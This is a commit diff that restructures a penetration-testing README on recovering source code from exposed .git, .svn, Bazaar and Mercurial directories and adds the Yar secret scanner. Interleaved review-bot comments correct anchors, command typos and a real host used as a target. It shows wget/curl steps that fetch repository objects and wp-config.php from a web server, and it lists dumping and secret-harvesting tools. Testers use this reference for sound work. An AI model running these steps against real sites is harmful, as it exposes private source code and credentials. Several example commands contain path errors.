mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-23 21:05:27 +00:00
Clean up Insecure SCM page and add new tool yar
This commit is contained in:
parent
3a6ac550b8
commit
8c97cec6d8
@ -1,25 +1,35 @@
|
|||||||
# Insecure source code management
|
# Insecure source code management
|
||||||
|
|
||||||
- [GIT - Source code management](#git---source-code-management)
|
* [Git](#git)
|
||||||
- [Github example with a .git](#github-example-with-a-git)
|
+ [Example](#example)
|
||||||
- [Recovering the content of .git/index](#recovering-the-content-of-gitindex)
|
- [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-git-logs-head)
|
||||||
- [Automatic way : diggit.py](#automatic-way--diggitpy)
|
- [Recovering file contents from .git/index](#recovering-file-contents-from-git-index)
|
||||||
- [Automatic way : GoGitDumper](#automatic-way-gogitdumper)
|
+ [Tools](#tools)
|
||||||
- [Automatic way : rip-git](#automatic-way--rip-git)
|
- [Automatic recovery](#automatic-recovery)
|
||||||
- [Automatic way : GitHack](#automatic-way--githack)
|
* [diggit.py](#diggitpy)
|
||||||
- [Harvesting secrets : trufflehog](#harvesting-secrets--trufflehog)
|
* [GoGitDumper](#gogitdumper)
|
||||||
- [Harvesting secrets : Gitrob](#harvesting-secrets--gitrob)
|
* [rip-git](#rip-git)
|
||||||
- [Harvesting secrets : Gitleaks](#harvesting-secrets--gitleaks)
|
* [GitHack](#githack)
|
||||||
- [SVN - Source code management](#svn---source-code-management)
|
* [GitTools](#gittools)
|
||||||
- [SVN example (Wordpress)](#svn-example-wordpress)
|
- [Harvesting secrets](#harvesting-secrets)
|
||||||
- [Automatic way : svn-extractor](#automatic-way--svn-extractor)
|
* [trufflehog](#trufflehog)
|
||||||
- [BAZAAR - Source code management](#bazaar---source-code-management)
|
* [Yar](#yar)
|
||||||
- [Automatic way : rip-bzr](#automatic-way--rip-bzr)
|
* [Gitrob](#gitrob)
|
||||||
- [Automatic way : bzr_dumper](#automatic-way--bzr_dumper)
|
* [Gitleaks](#gitleaks)
|
||||||
- [MERCURIAL - Source code management](#mercurial---source-code-management)
|
* [Subversion](#svn)
|
||||||
- [Automatic way : rip-hg](#automatic-way--rip-hg)
|
+ [Example (Wordpress)](#example--wordpress-)
|
||||||
|
+ [Tools](#tools-1)
|
||||||
|
- [svn-extractor](#svn-extractor)
|
||||||
|
* [Bazaar](#bazaar)
|
||||||
|
+ [Tools](#tools-2)
|
||||||
|
- [rip-bzr.pl](#rip-bzrpl)
|
||||||
|
- [bzr_dumper](#bzr-dumper)
|
||||||
|
* [Mercurial](#mercurial)
|
||||||
|
+ [Tools](#tools-3)
|
||||||
|
- [rip-hg.pl](#rip-hgpl)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
## GIT - Source code management
|
## Git
|
||||||
|
|
||||||
The following examples will create either a copy of the .git or a copy of the current commit.
|
The following examples will create either a copy of the .git or a copy of the current commit.
|
||||||
|
|
||||||
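Review bot: several of the new table-of-contents links in this hunk will not resolve on GitHub, whose anchor generation lowercases the heading, drops all punctuation other than hyphens and underscores, and turns spaces into hyphens. `[Subversion](#svn)` should point at `#subversion` to match the new `## Subversion` heading; `[Example (Wordpress)](#example--wordpress-)` should be `#example-wordpress`; `[bzr_dumper](#bzr-dumper)` should keep the underscore, `#bzr_dumper`, as the removed entry did; and the two `.git/...` entries should be `#recovering-file-contents-from-gitlogshead` and `#recovering-file-contents-from-gitindex`, since dots and slashes are dropped rather than replaced (compare the removed, correct `#recovering-the-content-of-gitindex`). The `#tools`, `#tools-1`, `#tools-2`, `#tools-3` suffixes for the four repeated `Tools` headings are right.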
@ -29,28 +39,32 @@ Check for the following files, if they exist you can extract the .git folder.
|
|||||||
- .git/HEAD
|
- .git/HEAD
|
||||||
- .git/logs/HEAD
|
- .git/logs/HEAD
|
||||||
|
|
||||||
### Github example with a .git
|
### Example
|
||||||
|
|
||||||
1. Check 403 error (Forbidden) for .git or even better : a directory listing
|
#### Recovering file contents from .git/logs/HEAD
|
||||||
2. Git saves all information in log file .git/logs/HEAD (try 'head' in lowercase too)
|
|
||||||
|
1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
|
||||||
|
2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
|
||||||
```powershell
|
```powershell
|
||||||
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
|
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
|
||||||
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
|
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
|
||||||
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
|
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
|
||||||
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
|
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
|
||||||
```
|
```
|
||||||
3. Access to the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c,
|
3. Access the commit using the hash
|
||||||
```powershell
|
```powershell
|
||||||
# create a .git directory
|
# create an empty .git repository
|
||||||
git init test
|
git init test
|
||||||
cd test/.git
|
cd test/.git
|
||||||
|
|
||||||
# download the file
|
# download the file
|
||||||
wget http://xxx.web.xxx.com/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
|
wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
|
||||||
|
|
||||||
|
# first byte for subdirectory, remaining bytes for filename
|
||||||
mkdir .git/object/26
|
mkdir .git/object/26
|
||||||
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
|
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
|
||||||
|
|
||||||
# display the content of the file
|
# display the file
|
||||||
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
|
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
|
||||||
tree 323240a3983045cdc0dec2e88c1358e7998f2e39
|
tree 323240a3983045cdc0dec2e88c1358e7998f2e39
|
||||||
parent 15ca375e54f056a576905b41a417b413c57df6eb
|
parent 15ca375e54f056a576905b41a417b413c57df6eb
|
||||||
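Review bot: the paths in the step 3 block are inconsistent with the `cd test/.git` that precedes them, and the unchanged `mkdir .git/object/26` has a typo. After `cd test/.git` the working directory is already the repository's `.git`, so the object belongs in `objects/26/`, not `.git/objects/26/`; and `mkdir .git/object/26` (singular `object`) creates a directory that the following `mv ... .git/objects/26/` never uses. Suggest `mkdir -p objects/26` and `mv e35470d38c4d6815bc4426a862d5399f04865c objects/26/`, or drop the `cd` and keep `.git/objects/26` throughout. Since the surrounding lines are being rewritten anyway, this is the right place to fix it.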
@ -60,7 +74,7 @@ Check for the following files, if they exist you can extract the .git folder.
|
|||||||
```
|
```
|
||||||
4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
|
4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
|
||||||
```powershell
|
```powershell
|
||||||
wget http://xxx.web.xxx.com/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
|
wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
|
||||||
mkdir .git/object/32
|
mkdir .git/object/32
|
||||||
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
|
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
|
||||||
|
|
||||||
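Review bot: same `mkdir .git/object/32` (singular `object`) typo as in step 3; the `mv` on the next line targets `.git/objects/32/`, which this `mkdir` does not create. Suggest `mkdir -p .git/objects/32`.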
@ -73,22 +87,22 @@ Check for the following files, if they exist you can extract the .git folder.
|
|||||||
```
|
```
|
||||||
5. Read the data (flag.txt)
|
5. Read the data (flag.txt)
|
||||||
```powershell
|
```powershell
|
||||||
wget http://xxx.web.xxx.com/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
|
wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
|
||||||
mkdir .git/object/cb
|
mkdir .git/object/cb
|
||||||
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
|
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
|
||||||
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
|
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
|
||||||
```
|
```
|
||||||
|
|
||||||
### Recovering the content of .git/index
|
#### Recovering file contents from .git/index
|
||||||
|
|
||||||
Use the git index file parser, using python3 https://pypi.python.org/pypi/gin
|
Use the git index file parser https://pypi.python.org/pypi/gin (python3).
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
pip3 install gin
|
pip3 install gin
|
||||||
gin ~/git-repo/.git/index
|
gin ~/git-repo/.git/index
|
||||||
```
|
```
|
||||||
|
|
||||||
Recover name and sha1 hash for each files listed in the index, allowing us to re-use the previous method on the file.
|
Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
$ gin .git/index | egrep -e "name|sha1"
|
$ gin .git/index | egrep -e "name|sha1"
|
||||||
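Review bot: step 5 moves the object into the wrong directory: `mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/` puts the blob under `32/`, but git looks for object `cb6139...` at `objects/cb/6139...`, so the following `git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f` fails with a missing-object error. It should be `.git/objects/cb/` (and `mkdir .git/object/cb` has the same singular `object` typo as the earlier steps). These are unchanged context lines, but this block is the one readers copy, so it is worth fixing in this pass.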
@ -99,9 +113,11 @@ name = CRLF injection/README.md
|
|||||||
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
|
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Tools
|
||||||
|
|
||||||
|
#### Automatic recovery
|
||||||
|
|
||||||
### Automatic way : diggit.py
|
##### diggit.py
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
|
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
|
||||||
@ -112,7 +128,7 @@ sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
|
|||||||
-o is a hash of particular Git object to download
|
-o is a hash of particular Git object to download
|
||||||
```
|
```
|
||||||
|
|
||||||
### Automatic way : GoGitDumper
|
##### GoGitDumper
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
go get github.com/c-sto/gogitdumper
|
go get github.com/c-sto/gogitdumper
|
||||||
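Review bot: `go get github.com/c-sto/gogitdumper` no longer installs a binary on current Go toolchains (since Go 1.17 `go get` only manages module dependencies and executables are installed with `go install`), so a reader following the GoGitDumper section gets a module-mode error rather than the tool. Suggest `go install <module path>@latest` (for example `go install github.com/c-sto/gogitdumper@latest` if the main package lives at the module root); the same applies to `go get github.com/nielsing/yar` in the new Yar section and `go get -u github.com/zricethezav/gitleaks` later in the patch.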
@ -121,11 +137,11 @@ git log
|
|||||||
git checkout
|
git checkout
|
||||||
```
|
```
|
||||||
|
|
||||||
### Automatic way : rip-git
|
##### rip-git
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
git clone https://github.com/kost/dvcs-ripper
|
git clone https://github.com/kost/dvcs-ripper
|
||||||
perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/"
|
perl rip-git.pl -v -u "http://web.site/.git/"
|
||||||
|
|
||||||
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
|
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
|
||||||
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
||||||
@ -136,14 +152,14 @@ committer Michael <michael@easyctf.com> 1489389105 +0000
|
|||||||
git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
||||||
```
|
```
|
||||||
|
|
||||||
### Automatic way : GitHack
|
##### GitHack
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
git clone https://github.com/lijiejie/GitHack
|
git clone https://github.com/lijiejie/GitHack
|
||||||
GitHack.py http://www.openssl.org/.git/
|
GitHack.py http://www.openssl.org/.git/
|
||||||
```
|
```
|
||||||
|
|
||||||
### Automatic way: GitTools
|
##### GitTools
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
git clone https://github.com/internetwache/GitTools
|
git clone https://github.com/internetwache/GitTools
|
||||||
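Review bot: the GitHack example still targets a real third-party host, `GitHack.py http://www.openssl.org/.git/`, while the other examples in this patch were normalised to the placeholder `http://web.site/.git/`. Replace it with the same placeholder so that copy-pasting the line does not send requests to openssl.org.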
@ -151,16 +167,27 @@ git clone https://github.com/internetwache/GitTools
|
|||||||
git checkout -- .
|
git checkout -- .
|
||||||
```
|
```
|
||||||
|
|
||||||
### Harvesting secrets : trufflehog
|
#### Harvesting secrets
|
||||||
|
|
||||||
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history
|
##### trufflehog
|
||||||
|
|
||||||
|
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
pip install truffleHog # https://github.com/dxa4481/truffleHog
|
pip install truffleHog # https://github.com/dxa4481/truffleHog
|
||||||
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
|
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
|
||||||
```
|
```
|
||||||
|
|
||||||
### Harvesting secrets : Gitrob
|
##### Yar
|
||||||
|
|
||||||
|
> Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
go get github.com/nielsing/yar # https://github.com/nielsing/yar
|
||||||
|
yar -o orgname --both
|
||||||
|
```
|
||||||
|
|
||||||
|
##### Gitrob
|
||||||
|
|
||||||
> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
|
> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
|
||||||
|
|
||||||
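Review bot: the new Yar block gives `yar -o orgname --both` without explaining the flags, whereas the diggit.py section annotates each option (`-o is a hash of particular Git object to download`). A short comment that `-o` takes the organization name and `--both` enables both the regex and entropy scanning mentioned in the quoted description would make the block self-contained, and would also make clear that `-o` means something different here than in the diggit.py block a few hunks up.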
@ -170,13 +197,13 @@ export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
|
|||||||
gitrob [options] target [target2] ... [targetN]
|
gitrob [options] target [target2] ... [targetN]
|
||||||
```
|
```
|
||||||
|
|
||||||
### Harvesting secrets - Gitleaks
|
##### Gitleaks
|
||||||
|
|
||||||
> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
|
> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# Run gitleaks against a public repository
|
# Run gitleaks against a public repository
|
||||||
docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
|
docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
|
||||||
|
|
||||||
# Run gitleaks against a local repository already cloned into /tmp/
|
# Run gitleaks against a local repository already cloned into /tmp/
|
||||||
docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks
|
docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks
|
||||||
@ -189,9 +216,9 @@ or
|
|||||||
go get -u github.com/zricethezav/gitleaks
|
go get -u github.com/zricethezav/gitleaks
|
||||||
```
|
```
|
||||||
|
|
||||||
## SVN - Source code management
|
## Subversion
|
||||||
|
|
||||||
### SVN example (Wordpress)
|
### Example (Wordpress)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
|
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
|
||||||
@ -204,26 +231,30 @@ curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
|
|||||||
2. Download interesting files
|
2. Download interesting files
|
||||||
* remove \$sha1\$ prefix
|
* remove \$sha1\$ prefix
|
||||||
* add .svn-base postfix
|
* add .svn-base postfix
|
||||||
* use first two signs from hash as folder name inside pristine/ directory (94 in this case)
|
* use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
|
||||||
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
|
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
|
||||||
|
|
||||||
### Automatic way : svn-extractor
|
### Tools
|
||||||
|
|
||||||
|
#### svn-extractor
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
git clone https://github.com/anantshri/svn-extractor.git
|
git clone https://github.com/anantshri/svn-extractor.git
|
||||||
python svn-extractor.py –url "url with .svn available"
|
python svn-extractor.py –url "url with .svn available"
|
||||||
```
|
```
|
||||||
|
|
||||||
## BAZAAR - Source code management
|
## Bazaar
|
||||||
|
|
||||||
### Automatic way : rip-bzr.pl
|
### Tools
|
||||||
|
|
||||||
|
#### rip-bzr.pl
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
|
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
|
||||||
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
|
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
|
||||||
```
|
```
|
||||||
|
|
||||||
### Automatic way : bzr_dumper
|
#### bzr_dumper
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
git clone https://github.com/SeahunOh/bzr_dumper
|
git clone https://github.com/SeahunOh/bzr_dumper
|
||||||
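Review bot: two copy-paste hazards in the unchanged context of this hunk: `python svn-extractor.py –url "url with .svn available"` uses an en dash (`–url`) instead of `--url`, so the argument parser will reject it; and the rip-bzr.pl docker line ends with a bare `-u` and no URL argument, so the command is incomplete as written (the rip-git example above passes `-u "http://web.site/.git/"`). Suggest fixing the dash and adding a placeholder URL argument in the same style, since the Bazaar Tools heading is being rewritten anyway.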
@ -248,9 +279,11 @@ $ bzr revert
|
|||||||
N static/
|
N static/
|
||||||
```
|
```
|
||||||
|
|
||||||
## MERCURIAL - Source code management
|
## Mercurial
|
||||||
|
|
||||||
### Automatic way : rip-hg.pl
|
### Tools
|
||||||
|
|
||||||
|
#### rip-hg.pl
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl
|
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl
|
||||||
|